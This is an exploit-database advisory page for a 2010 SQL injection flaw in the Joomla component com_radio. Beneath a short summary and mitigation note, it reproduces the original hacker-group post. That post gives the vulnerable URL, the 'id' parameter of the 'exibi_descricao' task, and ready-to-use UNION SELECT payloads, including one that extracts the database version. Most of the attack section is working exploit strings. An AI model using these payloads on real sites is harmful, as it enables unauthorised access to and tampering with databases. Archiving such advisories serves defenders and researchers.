Joomla Component com_radio SQL Injection Vulnerability

vendor:

N/A

by:

DevilZ TM

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: N/A

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component com_radio SQL Injection Vulnerability

A SQL injection vulnerability exists in the Joomla Component com_radio. An attacker can send a malicious SQL query to the vulnerable parameter 'id' in the 'exibi_descricao' task of the 'com_radio' component. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. Successful exploitation may allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database implementation.

Mitigation:

Input validation should be used to prevent SQL injection attacks. The application should also be configured to use the least privileged account with access to the database.

Source

Exploit-DB raw data:

# Title : Joomla Component com_radio SQL Injection Vulnerability
# Author: DevilZ TM
# Data  : 2010-03-29

[~]######################################### InformatioN #############################################[~]
 
[~] Title     : Joomla Component com_radio SQL Injection Vulnerability
[~] Author    : DevilZ TM By D3v1l
[~] Homepage  : http://www.DEVILZTM.com
[~] Email     : Expl0it@DevilZTM.Com
[~] Contact   : D3v1l.blackhat@yahoo.com
 
[~]#########################################   ExploiT   #############################################[~]
 
[~] Vulnerable File :
 
http://127.0.0.1/index.php?option=com_radio&task=exibi_descricao&id=[SQL]
 
[~] ExploiT         :
 
-1 UNION SELECT 1,2,3,4,5,6,7,8--
 
[~] Example         :
 
http://127.0.0.1/index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,4,5,6,7,8--

[~] Demo            :

http://server/index.php?option=com_radio&task=exibi_descricao&id=-1 UNION SELECT 1,2,3,version(),5,6,7,8--

  
[~]######################################### ThankS To ... ############################################[~]
 
[~] Special Thanks To My Best FriendS :
 
Exim0r , Raiden , b3hz4d , PLATEN , M4hd1 , Net.Edit0r , Amoo Arash , r3d-r0z AND All Iranian HackerS
 
[~] IRANIAN Young HackerZ
 
[~]#########################################   FinisH :D   #############################################[~]